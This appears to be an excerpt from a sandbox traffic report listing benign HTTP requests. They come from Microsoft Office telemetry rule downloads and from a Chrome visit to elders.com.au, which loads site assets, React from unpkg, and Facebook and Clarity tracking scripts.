Source: global trafficHTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /etc.clientlibs/el/clientlibs/clientlib-site/resources/images/svg/icon-magnifier.svg HTTP/1.1Host: elders.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://elders.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: affinity="e47c197095b8b7ee"
Source: global trafficHTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /etc.clientlibs/el/clientlibs/clientlib-site/resources/images/svg/icon-cart.svg HTTP/1.1Host: elders.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://elders.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: affinity="e47c197095b8b7ee"
Source: global trafficHTTP traffic detected: GET /etc.clientlibs/el/clientlibs/clientlib-dependencies.lc-d41d8cd98f00b204e9800998ecf8427e-lc.min.js HTTP/1.1Host: elders.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: affinity="e47c197095b8b7ee"
Source: global trafficHTTP traffic detected: GET /content/dam/eld/icons---logos/icons/el-logo-2.svg HTTP/1.1Host: elders.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: affinity="e47c197095b8b7ee"
Source: global trafficHTTP traffic detected: GET /etc.clientlibs/el/clientlibs/clientlib-site.lc-46a2df1a9bfaeeffbd5b53738ed986e6-lc.min.js HTTP/1.1Host: elders.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://elders.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: affinity="e47c197095b8b7ee"
Source: global trafficHTTP traffic detected: GET /etc.clientlibs/el/clientlibs/clientlib-site/resources/images/svg/icon-magnifier.svg HTTP/1.1Host: elders.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: affinity="e47c197095b8b7ee"
Source: global trafficHTTP traffic detected: GET /recaptcha/api.js?render=6LcVfMUkAAAAAEztwcBFPpzCQQaiMDwAGyboUKaF HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /etc.clientlibs/el/clientlibs/clientlib-react/resources/static/media/Meta-Pro-Medium.afe5599c.ttf HTTP/1.1Host: elders.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://elders.com.ausec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://elders.com.au/etc.clientlibs/el/clientlibs/clientlib-react.lc-3d0eb1ce53fb55bb5540e2cd4aabbacf-lc.min.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: affinity="e47c197095b8b7ee"
Source: global trafficHTTP traffic detected: GET /etc.clientlibs/el/clientlibs/clientlib-react/resources/static/media/Meta-Pro-Bold.cebc7f85.ttf HTTP/1.1Host: elders.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://elders.com.ausec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://elders.com.au/etc.clientlibs/el/clientlibs/clientlib-react.lc-3d0eb1ce53fb55bb5540e2cd4aabbacf-lc.min.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: affinity="e47c197095b8b7ee"
Source: global trafficHTTP traffic detected: GET /etc.clientlibs/el/clientlibs/clientlib-react/resources/static/media/Meta-Pro-Normal.a1cecbde.ttf HTTP/1.1Host: elders.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://elders.com.ausec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://elders.com.au/etc.clientlibs/el/clientlibs/clientlib-react.lc-3d0eb1ce53fb55bb5540e2cd4aabbacf-lc.min.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: affinity="e47c197095b8b7ee"
Source: global trafficHTTP traffic detected: GET /react@18/umd/react.development.js HTTP/1.1Host: unpkg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://elders.com.ausec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://elders.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /react-dom@18/umd/react-dom.development.js HTTP/1.1Host: unpkg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://elders.com.ausec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://elders.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /etc.clientlibs/el/clientlibs/clientlib-site/resources/images/svg/icon-down-arrow.svg HTTP/1.1Host: elders.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://elders.com.ausec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: imageReferer: https://elders.com.au/etc.clientlibs/el/clientlibs/clientlib-site.lc-b12902665e7f329d47d0e56b8a41e8e6-lc.min.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: affinity="e47c197095b8b7ee"
Source: global trafficHTTP traffic detected: GET /etc.clientlibs/el/clientlibs/clientlib-site/resources/images/svg/icon-external-link.svg HTTP/1.1Host: elders.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://elders.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: affinity="e47c197095b8b7ee"
Source: global trafficHTTP traffic detected: GET /en_US/fbevents.js HTTP/1.1Host: connect.facebook.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://elders.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /etc.clientlibs/el/clientlibs/clientlib-site/resources/images/svg/icon-cart.svg HTTP/1.1Host: elders.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: affinity="e47c197095b8b7ee"
Source: global trafficHTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /content/dam/eld/images/homepage-banners/rpu_q2_2024_landingpagebanner.jpg HTTP/1.1Host: elders.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://elders.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: affinity="e47c197095b8b7ee"
Source: global trafficHTTP traffic detected: GET /etc.clientlibs/el/clientlibs/clientlib-site.lc-46a2df1a9bfaeeffbd5b53738ed986e6-lc.min.js HTTP/1.1Host: elders.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: affinity="e47c197095b8b7ee"
Source: global trafficHTTP traffic detected: GET /etc.clientlibs/el/clientlibs/clientlib-site/resources/images/svg/icon-down-arrow.svg HTTP/1.1Host: elders.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: affinity="e47c197095b8b7ee"
Source: global trafficHTTP traffic detected: GET /etc.clientlibs/el/clientlibs/clientlib-site/resources/images/svg/icon-external-link.svg HTTP/1.1Host: elders.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: affinity="e47c197095b8b7ee"
Source: global trafficHTTP traffic detected: GET /content/dam/eld/icons---logos/icons/teamwork-icon.png HTTP/1.1Host: elders.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://elders.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: affinity="e47c197095b8b7ee"
Source: global trafficHTTP traffic detected: GET /content/dam/eld/icons---logos/icons/icon_farm_supplies.png HTTP/1.1Host: elders.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://elders.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: affinity="e47c197095b8b7ee"
Source: global trafficHTTP traffic detected: GET /react@18.3.1/umd/react.development.js HTTP/1.1Host: unpkg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://elders.com.ausec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://elders.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /react-dom@18.3.1/umd/react-dom.development.js HTTP/1.1Host: unpkg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://elders.com.ausec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://elders.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /tag/mupsjrmw7f HTTP/1.1Host: www.clarity.msConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://elders.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /content/dam/eld/icons---logos/icons/find-expert.png HTTP/1.1Host: elders.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://elders.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: affinity="e47c197095b8b7ee"
Source: global trafficHTTP traffic detected: GET /content/dam/eld/icons---logos/icons/Livestock.png HTTP/1.1Host: elders.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://elders.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: affinity="e47c197095b8b7ee"
Source: global trafficHTTP traffic detected: GET /etc.clientlibs/el/clientlibs/clientlib-site/resources/images/svg/icon-chevron-left.svg HTTP/1.1Host: elders.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://elders.com.au/etc.clientlibs/el/clientlibs/clientlib-site.lc-b12902665e7f329d47d0e56b8a41e8e6-lc.min.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: affinity="e47c197095b8b7ee"
Source: global trafficHTTP traffic detected: GET /react@18.3.1/umd/react.development.js HTTP/1.1Host: unpkg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /en_US/fbevents.js HTTP/1.1Host: connect.facebook.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /signals/config/1013340413305983?v=2.9.176&r=stable&domain=elders.com.au&hme=872f04a0547459b3285cb03b0d7a47bfde40628f4b386809918a621e2688602f&ex_m=70%2C121%2C107%2C111%2C61%2C4%2C100%2C69%2C16%2C97%2C89%2C51%2C54%2C172%2C175%2C187%2C183%2C184%2C186%2C29%2C101%2C53%2C77%2C185%2C167%2C170%2C180%2C181%2C188%2C131%2C41%2C189%2C190%2C34%2C143%2C15%2C50%2C195%2C194%2C133%2C18%2C40%2C1%2C43%2C65%2C66%2C67%2C71%2C93%2C17%2C14%2C96%2C92%2C91%2C108%2C52%2C110%2C39%2C109%2C30%2C94%2C26%2C168%2C171%2C140%2C86%2C56%2C84%2C33%2C73%2C0%2C95%2C32%2C28%2C82%2C83%2C88%2C47%2C46%2C87%2C37%2C11%2C12%2C13%2C6%2C7%2C25%2C22%2C23%2C57%2C62%2C64%2C75%2C102%2C27%2C76%2C9%2C8%2C80%2C48%2C21%2C104%2C103%2C105%2C98%2C10%2C20%2C3%2C38%2C74%2C19%2C5%2C90%2C81%2C44%2C35%2C85%2C2%2C36%2C63%2C42%2C106%2C45%2C79%2C68%2C112%2C60%2C59%2C31%2C99%2C58%2C55%2C49%2C78%2C72%2C24%2C113 HTTP/1.1Host: connect.facebook.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://elders.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /tag/mupsjrmw7f HTTP/1.1Host: www.clarity.msConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: CLID=a7d61f4104e24a3ab7dd66c7c8abcd4a.20241105.20251105
